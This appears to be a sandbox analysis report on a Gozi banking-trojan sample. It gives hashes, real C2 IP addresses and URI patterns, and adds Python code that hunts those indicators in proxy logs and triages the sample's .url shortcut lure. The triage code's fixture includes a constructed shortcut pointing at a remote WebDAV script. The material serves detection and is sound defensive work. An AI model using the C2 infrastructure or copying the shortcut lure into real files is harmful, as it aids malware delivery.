General

  • Target

    Agenzia27.zip

  • Size

    479B

  • Sample

    230322-qb5qksgh74

  • MD5

    ecd46cdc9dbe7430391afb524d2ee2ef

  • SHA1

    35ae9dca0c22afeb19b541145e61297f6dc260bb

  • SHA256

    977bb6a4ed4d96674a9194be41d969b178b639c3c04266a0f0e99315d9b84fe9

  • SHA512

    01e9e508f1152a6c0557fecd39ab64dd78314ee11a35c4bc420c5aa5a34fbee08f19be4928fc0fabcf061a263226a8f0efd6c8c2275dfcbad13b417684ae2505

Malware Config

Extracted

Family

gozi

Botnet

7715

C2

checklist.skype.com

62.173.142.50

31.41.44.87

109.248.11.217

212.109.218.151

5.44.45.83

62.173.142.81

193.233.175.113

109.248.11.184

212.109.218.26

185.68.93.7

Attributes
  • base_path

    /drew/

  • build

    250255

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain
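To make the extracted configuration actionable, here is an added example (not part of the sandbox report) that matches the C2 hosts, base_path and extension listed above against web-proxy logs. The IOC values are the ones in the config; the log format and the log lines are constructed for illustration. checklist.skype.com is a legitimate Microsoft host of the kind Gozi configs carry as a connectivity check, so it is kept out of the block list and a request to it alone is not reported.

```python
"""Match the Gozi C2 pattern from the extracted config against proxy logs.

Added example, not part of the sandbox report. C2 hosts, base_path and
extension are the values listed in the report; the log format and the
log lines below are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Values from the extracted config (botnet 7715, build 250255).
C2_HOSTS = {
    "62.173.142.50", "31.41.44.87", "109.248.11.217", "212.109.218.151",
    "5.44.45.83", "62.173.142.81", "193.233.175.113", "109.248.11.184",
    "212.109.218.26", "185.68.93.7",
}
# Legitimate Microsoft host listed first in the config; Gozi uses such an
# entry as a connectivity check, so it is deliberately not in C2_HOSTS.
CONNECTIVITY_CHECK_HOSTS = {"checklist.skype.com"}
BASE_PATH = "/drew/"
EXTENSION = ".jlk"

# Constructed log format (assumption): "<timestamp> <client> <method> <url> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def classify(url):
    """Return 'c2', 'suspect_host', 'suspect_uri' or None for one URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path
    uri_match = path.startswith(BASE_PATH) and path.endswith(EXTENSION)
    if host in CONNECTIVITY_CHECK_HOSTS:
        return None                      # benign host; on its own it proves nothing
    if host in C2_HOSTS:
        return "c2" if uri_match else "suspect_host"
    if uri_match:
        return "suspect_uri"             # same build, infrastructure not yet listed
    return None


def hunt(log_lines):
    """Return (client, url, verdict) for every log line that matches."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue                     # skip malformed lines rather than fail
        verdict = classify(m["url"])
        if verdict:
            hits.append((m["client"], m["url"], verdict))
    return hits


# Constructed sample log lines (clients and the 198.51.100.7 host are made up).
SAMPLE_LOG = """\
2023-03-22T10:01:02Z 10.0.0.15 GET http://checklist.skype.com/ 200
2023-03-22T10:01:05Z 10.0.0.15 GET http://62.173.142.50/drew/aGVsbG8/Xa1.jlk 200
2023-03-22T10:01:09Z 10.0.0.22 GET http://198.51.100.7/drew/report.jlk 404
2023-03-22T10:02:11Z 10.0.0.15 POST http://185.68.93.7/upload.php 200
2023-03-22T10:03:00Z 10.0.0.31 GET https://www.example.test/index.html 200
"""

if __name__ == "__main__":
    for client, url, verdict in hunt(SAMPLE_LOG.splitlines()):
        print(f"{verdict:13} {client:12} {url}")
```

Blocking the ten addresses is the easy part; the base_path plus extension pattern is what still catches this build after the operators rotate infrastructure, which is why the separate suspect_uri verdict exists.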

Extracted

Family

gozi

Targets

    • Target

      Agenzia/Agenzia.url

    • Size

      194B

    • MD5

      2e3efd45e12ebbb0307c66f9846db315

    • SHA1

      ca9308c31a6bf36a784f6cf52396c7c66ae4a2db

    • SHA256

      ef74e678ded46b0d5f69622154c95e5ea9f053cc9d0d47e10ca7b19a2b3e5981

    • SHA512

      24b8355fd77b7894184b34319f2a735c76cd8dd1a12525777b179e92b74e2cb46ea733d39ce2cca068fd1f95834ceab951c8b2d2ee0c6e1c17e80610c6842f0d

    • Gozi

      Gozi is a well-known and widely distributed banking trojan.

    • Checks computer location settings

      Looks up the country code configured in the registry, most likely a geofence check that decides whether the sample runs on this host at all.
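The delivery artifact is a 194-byte Internet Shortcut (.url) inside the zip. The report does not show its contents, so the parser below, an added example rather than anything from the sandbox, runs on a constructed shortcut pointing at a WebDAV share (203.0.113.10 is a documentation address). It reads the INI-style [InternetShortcut] section, extracts the URL= target that Windows opens on double-click, and flags the two things worth checking in such a lure: a remote UNC/WebDAV target and an executable or script file type.

```python
"""Triage a Windows Internet Shortcut (.url) such as Agenzia/Agenzia.url.

Added example, not the sandbox's code. A .url file is an INI-style text
file whose URL= value is what Windows opens. The sample content below is
constructed; the report does not show the real file's contents.
"""
import configparser
import posixpath
from urllib.parse import urlsplit

# File types a shortcut should never need to point at.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".lnk",
                     ".exe", ".dll", ".cmd", ".bat", ".ps1", ".scr"}


def parse_url_shortcut(text):
    """Return the [InternetShortcut] key/value pairs with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text.lstrip("\ufeff"))        # tolerate a UTF-8 BOM
    if "InternetShortcut" not in cp:
        raise ValueError("not an Internet Shortcut: no [InternetShortcut] section")
    return dict(cp["InternetShortcut"])


def triage_url_shortcut(text):
    """Describe where the shortcut points and list the findings an analyst wants."""
    fields = parse_url_shortcut(text)
    target = fields.get("url", "")
    parts = urlsplit(target)
    scheme = parts.scheme.lower()
    ext = posixpath.splitext(parts.path)[1].lower()
    info = {"target": target, "scheme": scheme, "host": None,
            "transport": None, "extension": ext, "findings": []}
    if scheme == "file" and parts.netloc:
        # file://<host>/<share>/... is opened as a UNC path. A plain host goes
        # over SMB; host@port or a DavWWWRoot path is the WebDAV mini-redirector.
        host = parts.netloc.split("@", 1)[0]
        webdav = "@" in parts.netloc or "/davwwwroot/" in parts.path.lower()
        info.update(host=host, transport="webdav" if webdav else "smb")
        info["findings"].append(
            "target is a remote share (%s), not a local file" % info["transport"])
    elif scheme in ("http", "https"):
        info.update(host=parts.hostname, transport=scheme)
    if ext in SCRIPT_EXTENSIONS:
        info["findings"].append("target is an executable/script type (%s)" % ext)
    return info


# Constructed sample; the real Agenzia.url's contents are not on the page.
SAMPLE_URL_FILE = """\
[InternetShortcut]
URL=file://203.0.113.10@80/DavWWWRoot/share/Agenzia.js
IconIndex=13
IconFile=C:\\Windows\\System32\\SHELL32.dll
"""

if __name__ == "__main__":
    result = triage_url_shortcut(SAMPLE_URL_FILE)
    print(result["target"], result["transport"], result["host"])
    for finding in result["findings"]:
        print(" -", finding)
```

A 194-byte file leaves room for little more than the URL= line and an icon entry, so the target itself is the whole story: if it is remote, the host is the next IOC to pivot on, and a WebDAV target means the fetch will show up as HTTP on the proxy rather than as SMB on the firewall.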

MITRE ATT&CK Enterprise v6

Tasks